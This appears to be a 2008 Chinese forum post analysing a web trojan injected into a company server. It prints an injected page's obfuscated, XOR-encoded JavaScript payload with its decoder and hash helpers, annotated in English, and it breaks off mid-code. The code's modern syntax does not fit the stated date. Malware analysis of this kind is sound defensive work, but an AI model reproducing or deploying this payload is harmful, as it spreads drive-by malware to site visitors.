
Web木马样本获取的简单流程

黑客 发布日期:2008-6-7 4:35:26 共有 1440 人次浏览
上午公司服务器也被挂马了,分析了下,顺便将步骤写出来了!共享之,没什么技术含量了,高手可以跳过了!



真够狠的啊,一下加入了8个,随便挑哪一个看看了,就第一个吧,vip1.htm,源码如下(注意:此类样本只能在隔离的分析环境中离线处理,不要直接在浏览器里打开):
<script>
// Obfuscated payload of the injected page (vip1.htm), assembled piecewise so that
// no single line carries a recognisable signature. The bytes are percent-escaped
// (escape()-style %XX sequences such as %0B, %5B, %7C), so the decode chain is
// presumably unescape() followed by the XOR() routine defined further down; the
// call site that feeds strHTML through it, the key, and the final sink
// (document.write/eval or similar) are NOT part of the visible excerpt, so the
// decoded content is unknown here — TODO confirm against the rest of the page.
// Handling note: decode this offline (replace the sink with plain output) rather
// than loading the page, so the sample's next stage is never fetched or run.
// One piece below contains "\/", which is the JS string escape for "/"; after
// unescape() the data is therefore not purely %XX-derived.
strHTML="";
strHTML+="%0BJP%17XG%12%14%16F%05%0DZF@%15%02J%1DR%16%16Q%11Y%5B%01RK%05%0AITJ%1";
strHTML+="C%06%1F%5D%15%0AY%1B%15S@%5BD%11%06%12EFK%5BG%16WC%13%17%06%08il%0BW%5";
strHTML+="C%16RE%0FD%11%0AF%3D8%0E%5D%03J%04_TEK@%01%0F%18%5C%05J%0F%02%14VTV%5B";
strHTML+="%11%3Al%08JZ%09CQ@%5D%15L%5B%3F%3BYKQ%10%5BB%16%19%09%07%0A%01BXT%00%0";
strHTML+="C%15%2CU%13U5S@%5BD%11%1A%5B%3F%3BY%19%1FO%3F8%06V%06%13%09%03YM%1D%12";
strHTML+="C%5E%12Q%09ZN%12%0EAW%17Q%15F%0F%13Y@BQG%16%5C%14%17H%05BMV%14@%05J%5D";
strHTML+="%01%18%0FT%00%1E%5D%01%0BI%5BUQ%14%5B%06J%1E%06R%5E%05%11%12RHBXm%15%0";
strHTML+="E@%11D%5C%1F%1DEC%12%16%0EX%00%5D%00%0ALQ%5D%0F%16%5DH%01%1ERe%11%5ERB";
strHTML+="%12Q%14ET%0Dn%10hT%08Vn%06Wd%03Q%06nS%0AQ%3AUT%04e%02W%01kW%05RhW%01%0";
strHTML+="5n%05T%099%03%03Vd%03P%04nW%0F9WTSk%08%00Um%06V%019%16%5DYV%0FhG%5B%09";
strHTML+="SB%16QV%3E%10%09%0B%5DW%5B8DTU@%0CU%0D%3A%16%5E%5D%02%03%0Fn%16%27%7C%";
strHTML+="5C%04rP%0D%04O%04%07%23%0AHWU%22%07e%11%5EXSR%099%16K%09%0A%01uH%08Uq%";
strHTML+="01Q%7EqP%0BwQ%0F9D_%0FSA%0E%0CU%05M%5D%01%07MYV%06%0F%01SXn%13%0AHW%0C";
strHTML+="n%10YM%17%1F%1F%10VK%13%04UX%5B%1C%01%5B%05E_WZ%11%16%06@T%04LW%27%5EW";
strHTML+="%0F%5C%0B%12L%3A%15VQ%0FTT%12hG%1DO%0BDSFE%5CX%03%0A%04%5C%5DLAW%16x%1";
strHTML+="1%12%16%0FULG%00%19%5E%02%18%0CP%1E%19%09DU%17%18%06ZX%09Y__%03%09%14X";
strHTML+="%17F%07%13C%5CB%14RY%5BU%01%5BHs@WU%11%5D*P%5B%00%5BFJn%10\/P%06%14%0B%";
strHTML+="15X_GKIZ%0A%7C1%606l%10%1EhGdG%1B%0A%13Y@BT%0FS%02%13%07%16FTLG%00@FU%";
strHTML+="099%16%27T%5Dn%16%5EN%04@%11%06MF%07CCV%049D%00%04%19jG9%13%0C%10U%17%";
strHTML+="14%05EFWE%14%0DXn%13%17%5DS%0Fn%10YO%04%14D%01%0A%08%08%13PEFC%12C%05E";
strHTML+="FWE%14%5B%0B%0FP%01W%1C%01@W%03M%00%09%06%0CRZGMRB%12Q%14EU%1BQG@%00I%";
strHTML+="14%06%1A%06MF%07CCW%159D8D%1E%02E%04C%17%0E%09T%0F%05EFWE%14%5B%0B%1C%";
strHTML+="7E%15%5D%5CJn%10%25%7C1%3AFJTLG%00@FJ%04L%0F%05EFWE%14%5B%0B%1Cb%00VVJ";
strHTML+="%1B%09%15N%12%05%11%12RHB%06_%19%12M%15Q%5B%01%09DU%17%18%0B%0F%00%5EO";
strHTML+="E%15QG%16%5C%14%17%07%08%19VC%00_%1FO%0F%12C%11SGFQ%14I%06%5C%1F%12J%5";
strHTML+="B%16W%1A%01L%11%03%15%17TW%1D%17TD%16%5B%0BG%03r%5DVML%03%12EF%06MF%07";
strHTML+="CC%01WK%15%05%10RM%5C%03X%5B%03%1C%06A%12UCC%06I%0AL%09F%12OQ%17FW%13H";
strHTML+="%06%08J%05%5BV@%00%19%1E%5DB%04FFSGFQ%14I%06%5CBXYV%0D%1CQ%10%5C%04%12";
strHTML+="%01%09USV%06E%1F%3A%166%5C%03%5C%7E%1Cu%15H%09%5BR%04L%5B%0D%5Cn@%159D";
strHTML+="8D%1E%02P%10ER%17E%06Z%15%1EazQ%29t%00jT%06mF%07%1AQ%17M%00%17%15T%1Be";
strHTML+="%119%13%1B%3A%169%16JTY%1E%04L%03%18QP%11%5BZJQZ%0BU%04%0BM%1DJ%02%0FJ";
strHTML+="BT%14%5D%15@%3A%0E%10%1B%0Fh2J%1D%1CH%06%3Fh%0E%1D%11Z%17%0F%14%12%094";
strHTML+="9YBT%14%5D%15@FDKBQX%1A%11WI%11%17X%11Q@%0BI%11DZ%00BWP%11XX%08%14%0CZ";
strHTML+="%0FD%1A%1B%14%1E%18%01%5DR%10UW%0CF%1C%15K%0C%12%01N%15%1B%1A%5EL@%0FZ";
strHTML+="%01%5B%11%1E%5D%5CX%0AY%01%12%0CEQ%5C%0BF%09%5E%16%16%05%16%0FGM%0Dh%3";
strHTML+="B%0B%04%5B%01MF_%5CQ%5B%0BL%00JE%08%5D%5C%17%0F%10%10%5C%11%13%16%08%1";
strHTML+="7_R%09BRD%14%0AZ%15U%5EWW%11K%11SC%11%05%10%10WF%17K%0BF%02%07%5BJVG%1";
strHTML+="1X%08P%17U%01CFSF%11%05G@T%11M@%0C%12T%03U%16%03FX";
function XOR(strV,strPass){
  // The dropper's decoder: repeating-key XOR, char i of strV combined with key
  // char (i mod key length). It is its own inverse, XOR(XOR(s, k), k) === s, so
  // the same routine can be used to decode the sample offline once the key is
  // known. Edge cases: an empty strV yields ""; an empty key makes i % 0 NaN,
  // charCodeAt(NaN) NaN, and x ^ NaN is x, so strV is returned unchanged rather
  // than throwing. The key and the call site are not in the visible excerpt.
  const keyLength = strPass.length;
  const decoded = [];
  for (let pos = 0; pos < strV.length; pos += 1) {
    const keyCode = strPass.charCodeAt(pos % keyLength);
    decoded.push(String.fromCharCode(strV.charCodeAt(pos) ^ keyCode));
  }
  return decoded.join("");
}
var STR =
{
  hexcase : 0, /* hex output format. 0 - lowercase; 1 - uppercase */
  b64pad : "", /* base-64 pad character. "=" for strict RFC compliance */
  chrsz : 8, /* bits per input character. 8 - ASCII; 16 - Unicode */
  
  b64_hmac_md5:
    // Base64-encoded HMAC-MD5 of data under key.
    // NOTE(review): core_hmac_md5 and binl2b64 are called unqualified; in this
    // excerpt they exist only as properties of STR, so the call resolves only if
    // same-named globals are defined elsewhere on the page — otherwise it throws
    // ReferenceError. Confirm against the full page before relying on it.
    function(key, data) {
      const mac = core_hmac_md5(key, data);
      return binl2b64(mac);
    },
    
  b64_md5:
    // Base64-encoded MD5 of string s. The bit length is s.length * this.chrsz,
    // so it must be invoked as a method of STR (the default chrsz is 8, i.e.
    // one byte per character). str2binl, core_md5 and binl2b64 are referenced
    // unqualified and are not defined as globals in the visible excerpt —
    // NOTE(review): confirm they exist elsewhere on the page.
    function(s){
      const words = str2binl(s);
      const bitLength = s.length * this.chrsz;
      return binl2b64(core_md5(words, bitLength));
    },
    
  binl2b64:
    // Base64-encode an array of 32-bit words, reading bytes little-endian
    // (byte 0 of word 0 first). Reads this.b64pad, so call it as a method of
    // STR; with the default b64pad of "" the output is unpadded (set "=" for
    // RFC-style padding). Careful with the index expressions below:
    // `i+1 >> 2` parses as `(i+1) >> 2` because `+` binds tighter than `>>`.
    function(binarray){
     var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
     var str = "";
     // Three bytes per iteration -> four base64 digits.
     for(var i = 0; i < binarray.length * 4; i += 3)
     {
     // Reading past the end of binarray yields undefined, which the shift
     // coerces to 0 — that is the implicit zero-fill of the last triplet.
     var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
     | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
     | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
     for(var j = 0; j < 4; j++)
     {
     // Digits that would lie entirely beyond the input's bit length become pad.
     if(i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
     else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
     }
     }
     return str;
    },
    
  binl2hex:
    // Hex dump of an array of 32-bit words, little-endian: byte 0 of word 0 is
    // printed first, each byte as high nibble then low nibble. The letter case
    // comes from this.hexcase, so invoke it as a method of STR.
    function(binarray){
     const digits = this.hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
     const byteCount = binarray.length * 4;
     let out = "";
     for (let b = 0; b < byteCount; b += 1) {
       const word = binarray[b >> 2];
       const shift = (b % 4) * 8;
       out += digits.charAt((word >> (shift + 4)) & 0xF);
       out += digits.charAt((word >> shift) & 0xF);
     }
     return out;
    },
  
  binl2str:
    // Unpack an array of 32-bit words into a string, this.chrsz bits per
    // character, least-significant bits of each word first (with chrsz = 8 the
    // word 0x64636261 becomes "abcd"). Reads this.chrsz, so invoke it as a
    // method of STR. Uses >>> so the top bit of a word never sign-extends.
    function(bin){
     const bitsPerChar = this.chrsz;
     const charMask = (1 << bitsPerChar) - 1;
     const totalBits = bin.length * 32;
     const chars = [];
     for (let bit = 0; bit < totalBits; bit += bitsPerChar) {
       chars.push(String.fromCharCode((bin[bit >> 5] >>> (bit % 32)) & charMask));
     }
     return chars.join("");
    },
    
  bit_rol:
    // 32-bit rotate-left: bits shifted out at the top re-enter at the bottom via
    // the unsigned shift. The shift operators take cnt modulo 32, so cnt = 0
    // returns num as a signed 32-bit value. No `this` is used.
    function(num, cnt){
      const high = num << cnt;
      const low = num >>> (32 - cnt);
      return high | low;
    },
    
  core_hmac_md5:
    // HMAC-MD5 over the word-array representation, RFC 2104 structure:
    // MD5((K ^ opad) || MD5((K ^ ipad) || data)). Returns whatever core_md5
    // returns (b64_hmac_md5 passes it straight to binl2b64, so presumably an
    // array of 32-bit words). core_md5 and str2binl are referenced unqualified
    // and are not in the visible excerpt. this.chrsz scales the bit lengths, so
    // invoke it as a method of STR.
    // NOTE(review): what the dropper feeds into this HMAC is not shown here —
    // confirm against the call site before drawing conclusions about the key.
    function(key, data){
     const BLOCK_WORDS = 16; // one 512-bit block = 16 x 32-bit words
     let keyWords = str2binl(key);
     // Keys longer than one block are hashed down first, as RFC 2104 requires.
     if (keyWords.length > BLOCK_WORDS) {
       keyWords = core_md5(keyWords, key.length * this.chrsz);
     }
     // Shorter keys are implicitly zero-padded: a missing word is undefined,
     // and undefined ^ 0x36363636 coerces to 0x36363636.
     const innerKey = Array.from({ length: BLOCK_WORDS }, (_, w) => keyWords[w] ^ 0x36363636);
     const outerKey = Array.from({ length: BLOCK_WORDS }, (_, w) => keyWords[w] ^ 0x5C5C5C5C);
     const innerHash = core_md5(innerKey.concat(str2binl(data)), 512 + data.length * this.chrsz);
     return core_md5(outerKey.concat(innerHash), 512 + 128);
    },
